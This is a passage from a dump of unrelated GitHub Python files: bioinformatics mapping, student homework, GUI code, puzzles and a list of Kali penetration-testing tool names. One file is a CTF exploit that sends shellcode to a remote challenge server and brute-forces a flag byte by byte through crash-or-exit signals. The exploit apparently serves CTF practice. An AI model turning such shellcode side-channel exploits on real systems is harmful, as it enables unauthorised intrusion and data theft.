))\nmarkers = list(markers)\nprint(len(markers))\nprint('Preparing for mapping ...')\ntg.pp_adatas(ad_sc, ad_sp, genes=markers)\n\n##### Map\nprint('Mapping single cells onto space ...')\nfor i in range(9):\n # either using cpu or using GPU, I strongly recommend GPU, either from the server or from Google Collab\n ad_map = tg.map_cells_to_space(\n adata_sc=ad_sc,\n adata_sp=ad_sp,\n #device='cpu',\n device='cuda:0',\n )\n print('Saving map')\n ad_map.write(filename=f'data/ad_maps/SlideSeq/ad_map{i}.h5ad')\n\n##### Load the spatial data: STARmap 1549 voxels with 1020 genes\nprint('Reading STARmap spatial data ...')\nad_sp = sc.read_h5ad('data/STARmap.h5ad')\nprint(ad_sp)\n\n##### Load SMARTSeq2 sn data, 45768 profiled cells with 23178 genes\nprint('Reading MOp 10Xv3 single cell data ...')\nad_sc = sc.read_h5ad('data/SMARTSeq2.h5ad')\nprint(ad_sc)\n# normalize the number of counts within each cell to a fixed number\nprint('Normalizing counts ...')\nsc.pp.normalize_total(ad_sc)\nprint('Preparing for mapping ...')\ntg.pp_adatas(ad_sc, ad_sp, genes=None)\n\n##### Map\nprint('Mapping single cells onto space ...')\nfor i in range(9):\n # either using cpu or using GPU, I strongly recommend GPU, either from the server or from Google Collab\n ad_map = tg.map_cells_to_space(\n adata_sc=ad_sc,\n adata_sp=ad_sp,\n device='cuda:0',\n # device='cpu',\n mode='constrained',\n density_prior='uniform',\n num_epochs=500,\n target_count=ad_sp.shape[1],\n lambda_f_reg=1,\n lambda_count=1\n )\n print('Saving map')\n ad_map.write(filename=f'data/ad_maps/STARmap/ad_map{i}.h5ad')","repo_name":"JudithBernett/Spatial_Transcriptomics","sub_path":"obtain_tangram_ad_maps.py","file_name":"obtain_tangram_ad_maps.py","file_ext":"py","file_size_in_byte":2617,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"23162031769","text":"# 1\na = {'Андрій', 'Сергій', 'Олександр', 'Марія', 'Оксана'}\nb = {'Оксана', 'Андрій', 'Олексій', 'Сергій', 'Олександр', 'Іван'}\n\nprint('Імена боржників за Червень та Липень:')\nprint(a.intersection(b))\n\nprint('Імена боржників за Липень :')\nprint(b.difference(a))\n\n# 2\ncamelcase_strings = [\"FirstItem\", \"FriendsList\", \"MyTuple\"]\nsnakecase_strings = []\n\nfor string in camelcase_strings:\n snakecase_string = \"\"\n for i, char in enumerate(string):\n if char.isupper():\n if i > 0:\n snakecase_string += \"_\"\n snakecase_string += char.lower()\n else:\n snakecase_string += char\n snakecase_strings.append(snakecase_string)\n\nprint(snakecase_strings)\n","repo_name":"Serjkeey/homework-hillel","sub_path":"Homework_9/homework_9.py","file_name":"homework_9.py","file_ext":"py","file_size_in_byte":829,"program_lang":"python","lang":"uk","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"92285222","text":"from importlib import resources\nimport webbrowser\n\nfrom PyQt5 import uic, QtCore, QtWidgets\n\n\nclass TableCellActions(QtWidgets.QWidget):\n abort_job = QtCore.pyqtSignal(str)\n delete_job = QtCore.pyqtSignal(str)\n\n def __init__(self, job, *args, **kwargs):\n \"\"\"Actions in a table cell\n\n Used for the \"Running Uploads\" table in the \"Uploads\" tab.\n \"\"\"\n super(TableCellActions, self).__init__(*args, **kwargs)\n ref_ui = resources.files(\n \"dcoraid.gui.upload\") / \"widget_tablecell_actions.ui\"\n with resources.as_file(ref_ui) as path_ui:\n uic.loadUi(path_ui, self)\n\n self.job = job\n # signals and slots\n self.tb_abort.clicked.connect(self.on_abort)\n self.tb_delete.clicked.connect(self.on_delete)\n self.tb_error.clicked.connect(self.on_error)\n self.tb_retry.clicked.connect(self.on_retry)\n self.tb_view.clicked.connect(self.on_view)\n\n @QtCore.pyqtSlot()\n def on_abort(self):\n self.abort_job.emit(self.job.dataset_id)\n\n @QtCore.pyqtSlot()\n def on_delete(self):\n self.delete_job.emit(self.job.dataset_id)\n\n @QtCore.pyqtSlot()\n def on_error(self):\n msg = QtWidgets.QMessageBox()\n msg.setIcon(QtWidgets.QMessageBox.Critical)\n msg.setText(\"There was an error during data transfer. If this happens \"\n + \"often or with a particular type of dataset, please \"\n + \"\"\n + \"create an issue online.\")\n msg.setWindowTitle(\"Job {} error\".format(self.job.dataset_id[:5]))\n msg.setDetailedText(self.job.traceback)\n msg.exec_()\n\n @QtCore.pyqtSlot()\n def on_retry(self):\n self.job.retry_upload()\n\n @QtCore.pyqtSlot()\n def on_view(self):\n url = self.job.get_dataset_url()\n webbrowser.open(url)\n\n def refresh_visibility(self, job):\n \"\"\"Show or hide the different toolbuttons depending on the job state\"\"\"\n self.job = job\n state = job.state\n\n if state in [\"online\", \"verify\", \"finalize\", \"done\"]:\n self.tb_view.show()\n else:\n self.tb_view.hide()\n\n if state in [\"abort\", \"error\"]:\n self.tb_retry.show()\n else:\n self.tb_retry.hide()\n\n if state == \"error\":\n self.tb_error.show()\n else:\n self.tb_error.hide()\n\n if state in [\"compress\", \"transfer\"]:\n self.tb_abort.show()\n else:\n self.tb_abort.hide()\n\n if state not in [\"compress\", \"transfer\"]:\n self.tb_delete.show()\n else:\n self.tb_delete.hide()\n","repo_name":"DCOR-dev/DCOR-Aid","sub_path":"dcoraid/gui/upload/widget_tablecell_actions.py","file_name":"widget_tablecell_actions.py","file_ext":"py","file_size_in_byte":2711,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"4680446023","text":"# buildings - tablica zawierajaca 5-cio elementowe tablice [ (0_poczatek, 1_koniec, 2_ilosc_studentow, 3_koszt, 4_miejsce w tablicy T )]\r\n# posortowana względem początków przedziałów, a w przypadku identycznych początków, posortowana po końcach przedziałów\r\n\r\n# funkcja g(i,x,G,buildings) zwraca największą liczbę studentów jaka może mieszkać w akademikach o indeksach mniejszych od i, zawsze wliczając do tego\r\n# akademik na indeksie i; łączny koszt tych akedemików jest mniejszy lub równy x. \r\n# Dla wartości skrajnych: jeśli x jest większy lub równy cenie akademika to w tablicy wpisywana jest liczba studentów mogąych zamieszkać w tym akademiku, w przeciwnym\r\n# wypadku do komórek wpisywane jest zero\r\n\r\n# Po znalezieniu indeksu \"xyz\" akademika którego łączna liczba studentów jest największa symuluje się dodwawanie kolejnych akdemików. Cofając się w tył od znalezionego indeksu\r\n# \"xyz\" sprawdzając czy liczba_studentów - liczba_studentów_w_akademiku_xyz oraz budżet-cena_akademika_xyz są takie same w tablicy G oraz czy budynek kończy się przed\r\n# początkiem budynku xyz.\r\n\r\n# G[i][j] - tablica w której przechowywane są wartości zwracane przez g dla danego akademika na pozycji i oraz łacznym maksymalnym koszcie j\r\n\r\nfrom zad4testy import runtests\r\n\r\ndef g(i,x,G, tab):\r\n if G[i][x] != -1:\r\n return G[i][x]\r\n maksymalne=0\r\n if tab[i][3]<=x:\r\n maksymalne=tab[i][2]\r\n for j in range(i-1,-1,-1):\r\n if x-tab[i][3]>=0 and tab[j][1]maksymalnie:\r\n maksymalnie = G[j][p]\r\n odpowiedz=j\r\n \r\n \r\n result=[]\r\n ostatni=odpowiedz\r\n result.append(buildings[odpowiedz][4])\r\n maksymalnie-=buildings[odpowiedz][2]\r\n price=p-buildings[odpowiedz][3]\r\n for indeks in range(odpowiedz, -1, -1):\r\n if maksymalnie==G[indeks][price] and price>=0 and maksymalnie-buildings[indeks][2]>=0 and buildings[indeks][1]0\n debug(f\"dir={dir}, bomb_dist == WARMER:{bomb_dist == WARMER}\")\n if dir == (bomb_dist == WARMER):\n self.lower_bound = middle\n else:\n self.upper_bound = middle\n debug(f\"new bounds: {self.lower_bound}-{self.upper_bound}\")\n\n # cheating detection\n if self.lower_bound > self.upper_bound:\n raise AssertionError(\"You are cheating! (Or I am dumb)\")\n\n return self.guess_new(curr)\n\n def guess_new(self, curr):\n dist_to_low = abs(curr - self.lower_bound)\n dist_to_upp = abs(curr - self.upper_bound)\n return self.lower_bound if dist_to_low >= dist_to_upp else self.upper_bound-1\n\n\ndef getXGuess(currx, prevx, bomb_direction):\n # if bomb_direction == UNKNOWN:\n # return xGuesser.guess()\n # if bomb_direction == COLDER:\n return xGuesser.updateBounds(currx, prevx, bomb_direction)\n # return xGuesser.guess()\n\n\ndef getYGuess(curry, prevy, bomb_direction):\n return yGuesser.updateBounds(curry, prevy, bomb_direction)\n # return yGuesser.guess()\n\n# W: width of the building.\n# H: height of the building.\nW, H = [int(i) for i in input().split()]\nN = int(input()) # maximum number of turns before game over.\nX0, Y0 = [int(i) for i in input().split()] # Batman start position\n\ndebug(W, H, N, X0, Y0)\ndebug(\"I will guess it in max {} turns\".format(ceil(log2(max(W,H) - 0 + 1))))\n\nxGuesser = NumberGuesser(W)\ncurrx = X0\nyGuesser = NumberGuesser(H)\ncurry = Y0\n\nprevx, prevy = X0, Y0\n# game loop\nwhile 1:\n bomb_dir = input() # Current distance to the bomb compared to previous distance (COLDER, WARMER, SAME or UNKNOWN)\n\n new_currx = getXGuess(currx, prevx, bomb_dir)\n new_curry = getYGuess(curry, prevy, bomb_dir)\n if bomb_dir != UNKNOWN:\n prevx, prevy = currx, curry\n currx, curry = new_currx, new_curry\n print(str(currx) + \" \" + str(curry)) # the location of the next window Batman should jump to.\n\n","repo_name":"PROrock/codin-game-puzzles","sub_path":"python/very-hard/shadows-of-the-knight-2/knight-2.py","file_name":"knight-2.py","file_ext":"py","file_size_in_byte":2950,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"7647437938","text":"#!/usr/bin/env python3\n\n'''\nPlace the dict\n'''\n\n\ndef information_gathering():\n '''\n Return the dict\n '''\n\n rdict = {\n 1: 'acccheck',\n 2: 'ace-voip',\n 3: 'amap',\n 4: 'automater',\n 5: 0,\n 6: 'braa',\n 7: 'casefile',\n 8: 'cdpsnarf',\n 9: 'cisco-torch',\n 10: 'cookie-cadger',\n 11: 'copy-router-config',\n 12: 'dmitry',\n 13: 'dnmap',\n 14: 'dnsenum',\n 15: 'dnsmap',\n 16: 'dnsrecon',\n 17: 'dnstracer',\n 18: 'dnswalk',\n 19: 'dotdotpwn',\n 20: 'enum4linux',\n 21: 'enumiax',\n 22: 'exploitdb',\n 23: 'fierce',\n 24: 'firewalk',\n 25: 'fragroute',\n 26: 'fragrouter',\n 27: 'ghost-phisher',\n 28: 'golismero',\n 29: 'goofile',\n 30: 'lbd',\n 31: 'maltego-teeth',\n 32: 'masscan',\n 33: 'metagoofil',\n 34: 'miranda',\n 35: 'nmap',\n 36: 0,\n 37: 'p0f',\n 38: 'parsero',\n 39: 'recon-ng',\n 40: 'set',\n 41: 'smtp-user-enum',\n 42: 'snmpcheck',\n 43: 'sslcaudit',\n 44: 'sslsplit',\n 45: 'sslstrip',\n 46: 'sslyze',\n 47: 'thc-ipv6',\n 48: 'theharvester',\n 49: 'tlssled',\n 50: 'twofi',\n 51: 'urlcrazy',\n 52: 'wireshark',\n 53: 'wol-e',\n 54: 'xplico',\n 55: 'ismtp',\n 56: 'intrace',\n 57: 'hping3',\n }\n\n return rdict\n\n\ndef vulnerability_analysis():\n '''\n Return\n '''\n\n rdict = {\n 1: 'bbqsql',\n 2: 'bed',\n 3: 'cisco-auditing-tool',\n 4: 'cisco-global-exploiter',\n 5: 'cisco-ocs',\n 6: 'cisco-torch',\n 7: 'copy-router-config',\n 8: 0,\n 9: 0,\n 10: 'doona',\n 11: 'dotdotpwn',\n 12: 'greenbone-security-assistant',\n 13: 0,\n 14: 'hexorbase',\n 15: 0,\n 16: 'jsql',\n 17: 'lynis',\n 18: 'nmap',\n 19: 'ohrwurm',\n 20: 'openvas-administrator',\n 21: 'openvas-cli',\n 22: 'openvas-manager',\n 23: 'openvas-scanner',\n 24: 'oscanner',\n 25: 'powerfuzzer',\n 26: 'sfuzz',\n 27: 'sidguesser',\n 28: 'siparmyknife',\n 29: 'sqlmap',\n 30: 'sqlninja',\n 31: 'sqlsus',\n 32: 'thc-ipv6',\n 33: 'tnscmd10g',\n 34: 'unix-privesc-check',\n 35: 'yersinia',\n }\n\n return rdict\n\n\ndef wireless_attacks():\n '''\n Return\n '''\n\n rdict = {\n 1: 'aircrack-ng',\n 2: 'asleap',\n 3: 'bluelog',\n 4: 0,\n 5: 0,\n 6: 'blueranger',\n 7: 'bluesnarfer',\n 8: 'bully',\n 9: 'cowpatty',\n 10: 'crackle',\n 11: 'eapmd5pass',\n 12: 'fern-wifi-cracker',\n 13: 'ghost-phisher',\n 14: 'giskismet',\n 15: 0,\n 16: 0,\n 17: 'kalibrate-rtl',\n 18: 'killerbe',\n 19: 'kismet',\n 20: 'mdk3',\n 21: 'mfcuk',\n 22: 'mfoc',\n 23: 'mfterm',\n 24: 'multimon-ng',\n 25: 'pixiewps',\n 26: 'reaver',\n 27: 'redfang',\n 28: 'rtlsdr-scanner',\n 29: 'spooftooph',\n 30: 'wifi-honey',\n 31: 'wifitap',\n 32: 'wifite',\n }\n\n return rdict\n\n\ndef web_applications():\n '''\n Return\n '''\n rdict = {\n 1: 'apache-users',\n 2: 'arachni',\n 3: 'bbqsql',\n 4: 'blindelephant',\n 5: 'burpsuite',\n 6: 'cutycapt',\n 7: 0,\n 8: 'davtest',\n 9: 'deblaze',\n 10: 'drib',\n 11: 'dirbuster',\n 12: 'fimap',\n 13: 'funkload',\n 14: 'grabber',\n 15: 'jboss-autopwn',\n 16: 'joomscan',\n 17: 'jsql',\n 18: 'maltego-teeth',\n 19: 'padbuster',\n 20: 'paros',\n 21: 'parsero',\n 22: 'plecost',\n 23: 'powerfuzzer',\n 24: 'proxystrike',\n 25: 'recon-ng',\n 26: 'skipfish',\n 27: 'sqlmap',\n 28: 'sqlninjg',\n 29: 'sqlsus',\n 30: 'ua-tester',\n 31: 'uniscan',\n 32: 'vega',\n 33: 'w3af',\n 34: 'webscarab',\n 35: 0,\n 36: 0,\n 37: 'websploit',\n 38: 'wfuzz',\n 39: 'wpscan',\n 40: 'xsser',\n 41: 'zaproxy',\n }\n\n return rdict\n\n\ndef sniffing_spoofing():\n '''\n Return\n '''\n\n rdict = {\n 1: 'burpsuite',\n 2: 'dnschef',\n 3: 'fiked',\n 4: 'hamster-sidejack',\n 5: 'hexinject',\n 6: 'iaxflood',\n 7: 'inviteflood',\n 8: 'ismtp',\n 9: 0,\n 10: 'mitmproxy',\n 11: 'ohrwurm',\n 12: 'protos-sip',\n 13: 'rebind',\n 14: 'responder',\n 15: 'rtpbreak',\n 16: 'rtpinsertsound',\n 17: 'rtpmixsound',\n 18: 'sctpscan',\n 19: 'siparmyknife',\n 20: 'sipp',\n 21: 'sipvicious',\n 22: 'sniffjoke',\n 23: 'sslsplit',\n 24: 'ssltrip',\n 25: 'thc-ipv6',\n 26: 'voiphopper',\n 27: 'webscarab',\n 28: 'wifi-honey',\n 29: 'wireshark',\n 30: 'xspy',\n 31: 'yersinia',\n 32: 'zaproxy',\n }\n\n return rdict\n\n\ndef maintaining_access():\n '''\n Return\n '''\n\n rdict = {\n 1: 'cryptcat',\n 2: 'cymothoa',\n 3: 'dbd',\n 4: 'dns2tcp',\n 5: 'http-tunnel',\n 6: 'httptunnel',\n 7: 'intersect',\n 8: 'nishang',\n 9: 'polenum',\n 10: 'powersploit',\n 11: 'pwnat',\n 12: 'ridenum',\n 13: 'sbd',\n 14: 'u3-pwn',\n 15: 'webshells',\n 16: 'weevely',\n }\n\n return rdict\n\n\ndef reporting_tools():\n '''\n Return\n '''\n\n rdict = {\n 1: 'casefile',\n 2: 'cutycapt',\n 3: 'dos2unix',\n 4: 'dradis',\n 5: 'keepnote',\n 6: 'magictree',\n 7: 'metagoofil',\n 8: 'nipper-ng',\n 9: 'pipal',\n }\n\n return rdict\n\n\ndef exploitation_tools():\n '''\n Return\n '''\n\n rdict = {\n 1: 'armitage',\n 2: 'backdoor-factory',\n 3: 'beef-xss',\n 4: 'cisco-auditing-tool',\n 5: 'cisco-global-exploiter',\n 6: 'cisco-ocs',\n 7: 'cisco-torch',\n 8: 0,\n 9: 'crackle',\n 10: 'jbos-autopwn',\n 11: 'linux-exploit-suggester',\n 12: 'maltego-teech',\n 13: 'set',\n 14: 'shellnoob',\n 15: 'sqlmap',\n 16: 'thc-ipv6',\n 17: 'yersinia',\n }\n\n return rdict\n\n\ndef forensics_tools():\n '''\n Return\n '''\n\n rdict = {\n 1: 'binwalk',\n 2: 'bulk-extractory',\n 3: 0,\n 4: 'chntpw',\n 5: 'cuckoo',\n 6: 'dc3dd',\n 7: 'ddrescue',\n 8: 0,\n 9: 0,\n 10: 'dumpzilla',\n 11: 'extundelete',\n 12: 'foremost',\n 13: 'galleta',\n 14: 'guymager',\n 15: 'iphone-backup-analyzer',\n 16: 'p0f',\n 17: 'pdf-parser',\n 18: 'pdfid',\n 19: 'pdgmail',\n 20: 'peepdf',\n 21: 0,\n 22: 'volatility',\n 23: 'xplico',\n }\n\n return rdict\n\n\ndef stress_testing():\n '''\n Return\n '''\n\n rdict = {\n 1: 'dhcpig',\n 2: 'funkload',\n 3: 'iaxflood',\n 4: 0,\n 5: 'inviteflood',\n 6: 'ipv6-toolkit',\n 7: 'mdk3',\n 8: 'reaver',\n 9: 'rtpflood',\n 10: 'slowhttptest',\n 11: 't50',\n 12: 'termineter',\n 13: 'thc-ipv6',\n 14: 'thc-ssl-dos',\n }\n\n return rdict\n\n\ndef password_attacks():\n '''\n Return\n '''\n\n rdict = {\n 1: 'acccheck',\n 2: 'burpsuite',\n 3: 'cewl',\n 4: 'chntpw',\n 5: 'cisco-auditing-tools',\n 6: 'cmospwd',\n 7: 'creddump',\n 8: 'crunch',\n 9: 0,\n 10: 'findmyhash',\n 11: 'gpp-decrypt',\n 12: 'hash-identifier',\n 13: 'hexorbase',\n 14: 0,\n 15: 'john',\n 16: 'johnny',\n 17: 'keimpx',\n 18: 'maltego-teeth',\n 19: 'maskprocessor',\n 20: 'multiforcer',\n 21: 'ncrack',\n 22: 'oclgausscrack',\n 23: 'pack',\n 24: 'patator',\n 25: 0,\n 26: 'polenum',\n 27: 'rainbowcrack',\n 28: 'rcracki-mt',\n 29: 'rsmangler',\n 30: 0,\n 31: 'statsprocessor',\n 32: 'thc-pptp-bruter',\n 33: 'truecrack',\n 34: 'webscarab',\n 35: 'wordlists',\n 36: 'zaproxy',\n }\n\n return rdict\n\n\ndef reverse_engineering():\n '''\n Return\n '''\n\n rdict = {\n 1: 'apktool',\n 2: 'dex2jar',\n 3: 'python-diStorm3',\n 4: 'edb-debugger',\n 5: 'jad',\n 6: 'javasnoop',\n 7: 'JD',\n 8: 'OllyDbg',\n 9: 'smali',\n 10: 'Valgrind',\n 11: 'YARA',\n }\n\n return rdict\n\n\ndef hardware_hacking():\n '''\n Return\n '''\n\n rdict = {\n 1: 'android-sdk',\n 2: 'apktool',\n 3: 'arduino',\n 4: 'dex2jar',\n 5: 'sakis3g',\n 6: 'smali',\n }\n\n return rdict\n\n\ndef extra():\n '''\n Return\n '''\n\n rdict = {\n 1: 0,\n 2: 'squid3',\n }\n\n return rdict\n","repo_name":"rikonaka/katoolin4china","sub_path":"k4c/toollist.py","file_name":"toollist.py","file_ext":"py","file_size_in_byte":9125,"program_lang":"python","lang":"en","doc_type":"code","stars":73,"dataset":"github-code","pt":"77"} +{"seq_id":"31833905885","text":"#!/usr/bin/env python3\nfrom pwn import *\n\ncontext.arch = 'amd64'\ncontext.log_level = 'warning'\ncontext.terminal = ['tmux', 'split', '-h']\n\nENCODING = 'ISO-8859-1'\ns = lambda senddata : p.send(senddata.encode(ENCODING))\nsa = lambda recvdata, senddata : p.sendafter(recvdata.encode(ENCODING), senddata.encode(ENCODING))\nsl = lambda senddata : p.sendline(senddata.encode(ENCODING))\nsla = lambda recvdata, senddata : p.sendlineafter(recvdata.encode(ENCODING), senddata.encode(ENCODING))\nr = lambda numb=0x3f3f3f3f, timeout=0x3f3f3f3f : p.recv(numb, timeout=timeout).decode(ENCODING)\nru = lambda recvdata, timeout=0x3f3f3f3f : p.recvuntil(recvdata.encode(ENCODING), timeout=timeout).decode(ENCODING)\nuu32 = lambda data : u32(data.encode(ENCODING), signed='unsigned')\nuu64 = lambda data : u64(data.encode(ENCODING), signed='unsigned')\niu32 = lambda data : u32(data.encode(ENCODING), signed='signed')\niu64 = lambda data : u64(data.encode(ENCODING), signed='signed')\nup32 = lambda data : p32(data, signed='unsigned').decode(ENCODING)\nup64 = lambda data : p64(data, signed='unsigned').decode(ENCODING)\nip32 = lambda data : p32(data, signed='signed').decode(ENCODING)\nip64 = lambda data : p64(data, signed='signed').decode(ENCODING)\n\ndef bruteforce(idx, ch):\n global p\n local = 0\n if local:\n p = process('./sandbox')\n else:\n p = remote('124.16.75.162', 31056)\n\n ru('gift: 0x')\n flag_addr = int(ru('\\n')[:-1], 16)\n info('flag_addr = ' + hex(flag_addr))\n\n magic = 0xdeadbeefdeadbeef\n\n sh = asm('''\n xor rbx, rbx\n xor rdx, rdx\n mov rbx, {}\n mov rdx, {}\n xor rbx, rdx\n mov al, [rbx + {}]\n cmp al, {}\n je label\n int 3\n label:\n xor rax, rax\n mov al, 0x3c\n xor rdi, rdi\n syscall\n '''.format(flag_addr ^ magic, magic, idx, ch))\n #print(disasm(sh))\n\n #gdb.attach(p, 'set follow-fork-mode child\\nb *0x5555554010ea\\nc')\n\n if b'\\0' in sh:\n p.close()\n return 'failed'\n\n ru('pls input your shellcode: ')\n p.send(sh + b'\\0')\n\n #p.interactive()\n\n try:\n r = p.recv(timeout=0.1)\n except EOFError:\n r = ''\n finally:\n p.close()\n\n return r\n\nprint(bruteforce(0, ord('f')))\nprint(bruteforce(0, ord('l')))\nprint(bruteforce(4, ord('{')))\n\n'''\nflag = ''\nidx = 0\ntarget = b'OVER!\\n'\ntable = '0123456789abcdefghijklmnopqrstuvwxyz!{}_'\nwhile True:\n if bruteforce(idx, 0) == target:\n warning('Over')\n break\n else:\n warning('Not the end')\n for c in table:\n r = bruteforce(idx, ord(c))\n if r == target:\n flag += c\n idx += 1\n warning(flag)\n break\n'''\n\n","repo_name":"r4b3rt/writeups","sub_path":"NeverStopExpoit/20220723/ezbox/exp.py","file_name":"exp.py","file_ext":"py","file_size_in_byte":2704,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"71194230008","text":"career = ['Lawyer','Doctor/Pharmacist','Architecture/Physical Planner','Teacher/lecturer','Psychology','Lab Technician/Scientist']\r\ncareer_questions = ['Which field interest you most\\n1.Law and Philosophy\\n2.Public Health and Medecine\\n3.Built Environment and Real Estate Management\\\r\n \\n4.Early Chilhood Education and Teaching\\n5.Understanding Human Behaviour\\n6.chemical reactions','Favourite subjects\\n1.maths\\n2.sciences\\n3.Humanities\\n4.Languages']\r\ndef careerPath():\r\n print(\"Career planner\".center(60, \" \"))\r\n print(\"-\" * 60, \"\\n\")\r\n while True:\r\n print(career_questions[0])\r\n choice = eval(input(\"Enter your choice: \"))\r\n print(career_questions[1])\r\n choice2 = eval(input(\"Enter your choice: \"))\r\n if choice == 1:\r\n if choice2 == 3 and 4:\r\n print(\"Your best career path is\",career[0])\r\n else:\r\n print('The above Subject is not suitable for this course,\\\r\n \\nthis course takes Humanity and Languages') \r\n break\r\n\r\n elif choice == 2:\r\n if choice2 == 2 and 1:\r\n print(\"Your best career path is\",career[1])\r\n else:\r\n print('The above Subject is not suitable for this course,\\\r\n \\nthis course takes Sciences and Maths') \r\n break\r\n elif choice == 3:\r\n if choice2 == 3 and 1 and 2:\r\n print(\"Your best career path is\",career[2])\r\n else:\r\n print('The above Subject is not suitable for this course,\\\r\n \\nthis course takes Humanities,sciences and Maths') \r\n break\r\n elif choice == 4:\r\n if choice2 == 4 and 3:\r\n print(\"Your best career path is\",career[3])\r\n print('The above Subject is not suitable for this course,\\\r\n \\nthis course takes Humanities and Languages') \r\n break\r\n elif choice == 5:\r\n if choice2 == 2 and 3:\r\n print(\"Your best career path is\",career[4])\r\n print('The above Subject is not suitable for this course,\\\r\n \\nthis course takes Humanities and sciences.') \r\n break\r\n elif choice == 6:\r\n if choice2 == 2 and 1:\r\n print(\"Your best career path is\",career[5])\r\n print('The above Subject is not suitable for this course,\\\r\n \\nthis course takes sciences and Maths') \r\n break\r\n else:\r\n print('Error!!Wrong input') \r\n\r\n print(\"Thank you for consulting us,you are welcomed again\")\r\n print(\"-\" * 60, \"\\n\\n\")\r\n","repo_name":"JackWatua/Group-13-Hackathon-Projects","sub_path":"careerChallenge.py","file_name":"careerChallenge.py","file_ext":"py","file_size_in_byte":2671,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"73591135290","text":"from Utils import *\n\n# Part 1\n\ninp = \"11100010111110100\"\ndisk_len = 35651584\n\n\ndef fill_disk(a, desired):\n while len(a) < desired:\n b = a[-1::-1]\n b = \"\".join([str(int(x == '0')) for x in b])\n a = a + '0' + b\n\n print(len(a))\n\n return a[:disk_len]\n\n\ndata = fill_disk(inp, disk_len)\nchecksum = ''\n\nwhile len(data) % 2 == 0:\n print(len(data))\n checksum = ''\n for i in range(0, len(data), 2):\n pair = data[i:i+2]\n\n if pair[0] == pair[1]:\n checksum += '1'\n else:\n checksum += '0'\n\n data = checksum\n\nprint(data)\n\n# 10:12 (87th)\n\n# Part 2\n\n# 11:16 (68th)","repo_name":"bjebert/adventofcode","sub_path":"2016/16.py","file_name":"16.py","file_ext":"py","file_size_in_byte":636,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"40424437029","text":"from library.InDocTable import CInDocTableModel, CDateInDocTableCol, CFloatInDocTableCol, CCalculatedInDocTableCol\n\n\n'''\nCreated on 11.04.2014\n\n@author: atronah\n'''\n\n\nclass CClientAntrophometricModel(CInDocTableModel):\n def __init__(self, parent = None):\n super(CClientAntrophometricModel, self).__init__(u'ClientAnthropometric',\n u'id',\n u'client_id',\n parent)\n self.addCol(CDateInDocTableCol(u'Дата', 'date', 50))\n #atronah: возможно лучше текстом, так как CIntInDocTableCol вроде не допускает пустого значения \n self.addCol(CFloatInDocTableCol(u'Рост, см', 'height', 15, min = 30, max = 290, precision = 1))\n self.addCol(CFloatInDocTableCol(u'Вес, кг', 'weight', 15, min = 0.200, max = 700, precision = 3))\n self.addCol(CFloatInDocTableCol(u'Об. талии, см', 'waist', 15, min = 30, max = 500, precision = 1))\n self.addCol(CFloatInDocTableCol(u'Об. груди, см', 'bust', 15, min = 30, max = 500, precision = 1))\n self.addCol(CCalculatedInDocTableCol(u'Индекс массы тела', \n 'height', \n 50, \n additionalFieldList = ['weight'],\n calculateFunc = lambda h, w: round(w.toDouble()[0] / (max(h.toDouble()[0] / 100, 0.001) ** 2), 1)\n ))\n \n","repo_name":"dio4/vista_1","sub_path":"Registry/ClientAnthropometric.py","file_name":"ClientAnthropometric.py","file_ext":"py","file_size_in_byte":1689,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"29481917889","text":"class hashtag:\n def __init__(self):\n self.hashtag=\"\"\n self.veces=0\n def __rep__(self):\n return (self.hashtag,self.veces)\n def agregar(self,nombre):\n self.hashtag=nombre\n self.veces= 1\n def sumar(self,veces):\n self.veces=self.veces+veces\n \n\nclass Twitter:\n def __init__(self):\n self.trending_topics=[]\n def tweet(self,mensaje):\n hashtags=[]\n if len(mensaje)>140:\n return None\n else:\n c=0\n for i in mensaje:\n if i ==\"#\":\n existe = False\n for e in range(c,len(mensaje)):\n try:\n if mensaje[e+1]==\" \":\n break\n except: IndexError\n for y in hashtags:\n if y.hashtag == mensaje[c:e+1]:\n y.sumar(1)\n existe=True\n for y in self.trending_topics:\n if y == mensaje[c:e+1]:\n existe=True\n if not existe:\n a=hashtag()\n a.agregar(mensaje[c:e+1])\n hashtags.append(a)\n self.trending_topics.append(a.hashtag)\n\n c=c+1\n\nif __name__ == \"__main__\":\n twitter=Twitter()\n twitter.tweet(\"gano #laroja\")\n twitter.tweet(\"grande #chile\")\n twitter.tweet(\"#laroja con dos goles, le gano a brasil, grande #laroja\")\n print(twitter.trending_topics)\n ","repo_name":"pabloschwarzenberg/grader","sub_path":"tema9_ej1/tema9_ej1_15633608.py","file_name":"tema9_ej1_15633608.py","file_ext":"py","file_size_in_byte":1614,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"21410220498","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# # Numerical Homework 3\n# \n# Code as follow for problems that require it\n# \n# #### Original work created on 18/11/2022\n# \n# #### Author: Terry Cox \n# \n\n# In[2]:\n\n\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\n\n\n# ## Problem 1\n# \n\n# In[50]:\n\n\ndef f(x):\n return np.cos(2*x**2) - x**2\n\ndef dx(x):\n return -4*x*np.sin(2*x**2) - 2*x\n\nx = np.linspace(0, 1.5, 1000)\n\nplt.plot(x,f(x))\nplt.plot(x,dx(x))\nplt.show()\n\n\n# #### a)\n\n# In[51]:\n\n\ndef newton_iterate(x, f, dx):\n return x - f(x)/dx(x)\n\ndef Newtons_Method(f, dx, x0, tol=1e-10):\n results = {'x' : [x0], 'fx' : [f(x0)], 'abs_error' : [np.abs(f(x0))]}\n if dx(x0) == 0:\n print('Derivative is 0. Bad starting point.')\n return False\n \n i = 0\n while results['abs_error'][-1] > tol:\n x = newton_iterate(results['x'][-1], f, dx)\n fx = f(x)\n results['x'].append(x)\n results['fx'].append(fx)\n results['abs_error'].append(np.abs(fx))\n if i > 100000:\n print('running away!')\n return False\n i+=1\n return results\n\nx0 = 0.1\ntol = 1e-10\nnewton_results = 